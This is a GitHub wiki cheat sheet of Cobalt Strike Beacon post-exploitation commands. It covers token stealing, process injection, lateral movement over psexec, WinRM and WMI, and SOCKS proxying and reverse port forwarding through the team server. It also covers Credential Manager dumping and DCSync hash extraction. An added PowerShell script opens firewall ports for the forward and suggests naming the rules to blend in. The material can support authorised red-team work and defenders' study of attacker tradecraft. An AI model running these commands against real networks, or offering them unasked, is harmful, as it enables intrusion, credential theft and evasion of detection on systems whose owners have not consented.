Cobalt Strike cheat sheet - CraigDonkin/Infrastructure GitHub Wiki

Command execution

execute via cmd.exe

shell <command>

execute a command without cmd.exe

run <command>

Execute a command via powershell

powershell-import <script>
powershell <powershell command> 

Run a local .NET executable in memory as a post-exploitation job. The assembly is loaded into a temporary sacrificial process, not into the Beacon process itself.

execute-assembly <path to executable> <command line arguments>

Token impersonation

Steal and impersonate the primary token of another process (requires a privileged context for processes owned by other users):

steal_token <pid>

When finished:

rev2self

Create a token from plaintext credentials. This is a netonly logon: the token only applies to network authentication, local actions still run as the original user.

make_token <DOMAIN\user> <password>

Token store

The token store is per Beacon; tokens cannot be transferred between Beacons.

token-store steal <pid>
token-store show
token-store use <token id>
token-store remove <token id>
token-store remove-all

When finished:

rev2self

Process injection

Injects a new Beacon for the given listener into an existing process. Injecting into a process owned by another user requires an elevated context. The new Beacon lives inside that process: if the process exits, the Beacon is lost.

inject <pid> <x86|x64> <listener name>

Lateral Movement

Jump command: spawns a new Beacon on the target and returns a session for the given listener

jump <method> <target> <listener>

Methods:

psexec
psexec64
psexec_psh
winrm
winrm64

Remote-exec command: runs a single command on the target and returns its output, without spawning a Beacon

remote-exec <method> <target> <command>

Methods:

psexec
winrm
wmi

The wmi method uses COM, which can only be initialised under one security context per Beacon process. To run WMI as two different users from the same host, use the spawn commands to get a second Beacon in a fresh process and perform the WMI execution from there.

Session passing

To spawn a session for a listener use:

spawn <listener>

To spawn a session as a specific user from plaintext credentials use spawnas. The process is started from Beacon's current working directory, so cd to a directory the target user can read first (e.g. C:\):

spawnas <DOMAIN\user> <password> <listener>

Socks proxy

  • Only SOCKS5 supports authentication
  • Beacon only relays proxied traffic when it checks in, so you may need to set sleep to 0 (interactive) or proxied tools will time out. This makes the Beacon far noisier on the network.
  • SOCKS4a:

socks <port>

  • SOCKS5:

socks <port> socks5 disableNoAuth <username> <password> enableLogging

  • The SOCKS server listens on the team server, not on the compromised host: configure proxychains with the team server IP and the port specified above (plus the username and password for SOCKS5).

Reverse port forward

  • A reverse port forward binds a port on the compromised host; connections to it are tunnelled through Beacon and the team server then connects to the forward host and port. In the example below, 127.0.0.1:80 is port 80 on the team server, not on the compromised host.
  • To bind port 8080 on the compromised host and relay it to port 80 on the team server:
  • First create an allow rule through the Windows firewall with PowerShell (requires an elevated Beacon); remove the rule again when you are done.
powershell New-NetFirewallRule -DisplayName "<something>" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080
powershell Remove-NetFirewallRule -DisplayName "<as above>"
rportfwd 8080 127.0.0.1 80

  • Then target port 8080 on the compromised host from other servers to relay the traffic. Use rportfwd stop 8080 to tear the forward down.
http://<compromised-IP>:8080
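The firewall rule and the listener check above wrapped into a small script, as an added example that is not part of the original wiki: it creates the allow rule only if it does not already exist, confirms that something (the Beacon process) is actually bound to the port after rportfwd, and removes the rule on cleanup. Load it with powershell-import and call the functions with powershell from an elevated Beacon. The port 8080, the rule name prefix "Inbound-" and the function names are assumptions of this example.

```powershell
# Added example, not from the original wiki. Port 8080 and the "Inbound-<port>"
# rule name are assumed values; change them to blend in with the host's existing rules.

function Open-RportfwdPort {
    param([int]$Port = 8080, [string]$RuleName = '')
    if (-not $RuleName) { $RuleName = "Inbound-$Port" }
    # Idempotent: do not stack a second rule if one with this name already exists.
    if (-not (Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $RuleName -Direction Inbound -Protocol TCP `
            -Action Allow -LocalPort $Port | Out-Null
    }
    Get-NetFirewallRule -DisplayName $RuleName | Select-Object DisplayName, Enabled, Action
}

function Test-RportfwdPort {
    param([int]$Port = 8080)
    # After 'rportfwd <port> <host> <port>' in Beacon, the Beacon process should own a
    # listening socket on $Port. Nothing listening means the forward is not in place.
    $listeners = @(Get-NetTCPConnection -LocalPort $Port -State Listen -ErrorAction SilentlyContinue)
    if ($listeners.Count -eq 0) {
        return "Nothing is listening on $Port; run rportfwd first or check the Beacon output"
    }
    foreach ($l in $listeners) {
        $name = (Get-Process -Id $l.OwningProcess -ErrorAction SilentlyContinue).ProcessName
        "$($l.LocalAddress):$Port is listening, owned by PID $($l.OwningProcess) ($name)"
    }
}

function Close-RportfwdPort {
    param([int]$Port = 8080, [string]$RuleName = '')
    if (-not $RuleName) { $RuleName = "Inbound-$Port" }
    # Run after 'rportfwd stop <port>' in Beacon so the host is left as it was found.
    Remove-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue
}
```

Typical sequence from the Beacon console: powershell-import the script, powershell Open-RportfwdPort -Port 8080, then rportfwd 8080 127.0.0.1 80, then powershell Test-RportfwdPort -Port 8080 to confirm the listener before pointing other hosts at it; when finished, rportfwd stop 8080 followed by powershell Close-RportfwdPort -Port 8080.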

Jobs

To view running jobs, run jobs

To kill a job use jobkill <JID>. To kill a process (for example the sacrificial process a job was spawned into) use kill <PID>.

Credential manager

  • To enumerate the current user's Windows Credential Manager vaults and the credentials they hold:
run vaultcmd /list
run vaultcmd /listcreds:"<vault name>" /all 

Perform DCSync

Uses mimikatz to pull the password hash of the given user from the domain controller via replication. The current token needs replication rights on the domain (Domain Admins, or an account granted DS-Replication-Get-Changes and DS-Replication-Get-Changes-All).

dcsync <domain.fqdn> <DOMAIN\username>